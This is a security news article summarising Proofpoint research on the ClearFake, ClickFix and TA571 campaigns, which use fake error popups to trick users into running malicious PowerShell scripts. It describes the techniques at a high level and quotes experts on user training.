It’s bad enough that crooks foist malware on us for their profit – now some are persuading users to do their work for them. Security researchers have identified a technique using social engineering to persuade users to copy and run malicious PowerShell scripts that infect their computers with multiple forms of malware.
ClearFake
Researchers at Proofpoint first saw the technique in early April in the ClearFake campaign, which compromises legitimate websites with malicious HTML and JavaScript. A malicious script, hosted on blockchain via Binance’s Smart Chain contracts (a technique known as “EtherHiding”), would load. It in turn downloaded another script which, if the user continued to browse, ultimately presented its victim with a popup claiming that there was a site error, and that they should install a “root certificate” to correct the problem. Helpfully, it offered a button to click to download the “certificate” and provided instructions on how to install it using PowerShell.
This installation led to a series of other PowerShell executions that downloaded various malicious payloads, which, in campaigns in May, included installing a crypto miner and a program that replaced cryptocurrency addresses in the Windows clipboard with those directing the funds to the threat actor.
However, to defeat detection, the scripts first performed checks to ensure the user was not operating in a virtual machine or sandbox (a common way for researchers to vet suspicious sites without compromising their machines); if a VM or sandbox was detected, the script exited without performing its malicious activities.
ClickFix
Another threat actor popped up a message saying something had gone wrong while displaying a web page, and (surprise!) the user should copy the code for a fix and install it using PowerShell. As with ClearFake, it provided clear instructions on how to “patch” the system. ProofPoint said that this exploit lasted only a few days before becoming inactive, and a few days later, it was replaced by the ClearFake exploit. “As the pley[.]es domain itself seems to be compromised, it’s unclear if these two activity sets – ClearFake and ClickFix – started to work with each other, or if the ClearFake actor re-compromised the iframe, replacing the code with its own content,“ ProofPoint said in its blog post. Regardless, the ClearFake compromise remains active on sites originally infected with ClickFix.
“The lures are effective,” said David Shipley, CEO and cofounder of Beauceron Security, “because they’re aimed at helping people, use language regular folks see but don’t understand (certificates) and look close enough to real dialogue buttons that if you’re busy, inexperienced, or feeling frustrated, look real enough.”
Spoofing Microsoft Word errors
Another threat actor, TA571, sent emails containing attachments resembling Microsoft Word, and, when they were opened, displayed an error message claiming that the “Word Online” browser extension was missing. Both the “how to fix” and “Auto-fix” buttons led to the same result: malware.
This threat actor continues to refine its attack, changing error messages and enticements to users to run PowerShell scripts that install malware, ProofPoint said..
“This is criminal innovation in the wake of moves by Microsoft and security tools to catch and stop previous techniques that relied a lot on macros in file attachments,” Shipley noted. “It’s smart, can be delivered via links in phishing e-mails or via poisoned ad networks or via attachments, so it’s a multi-use scalable tool.“
Common techniques
The threat actors may have been borrowing ideas from each other. “In all cases, both via the fake updates or the HTML attachments, the malicious PowerShell/CMD script is copied to the clipboard via browser-side JavaScript, commonly used on legitimate sites too,” ProofPoint said. These techniques, and the fact that antivirus software and EDRs have difficulty inspecting clipboard content, make it hard to detect and block attacks of this nature unless protection is in place before the user accesses the malicious site.
However, it said in its blog post, “This attack chain requires significant user interaction to be successful. The social engineering in the fake error messages is clever and purports to be an authoritative notification coming from the operating system. It also provides both the problem and a solution so that a viewer may take prompt action without pausing to consider the risk. The attack chain is unique and aligns with the overall trend Proofpoint has observed of cybercriminal threat actors adopting new, varied, and increasingly creative attack chains – including improving social engineering, nested PowerShell, and the use of WebDAV and SMB – to enable malware delivery.
“Organizations should train users to identify the activity and report suspicious activity to their security teams. This is very specific training but can easily be integrated into an existing user training program.”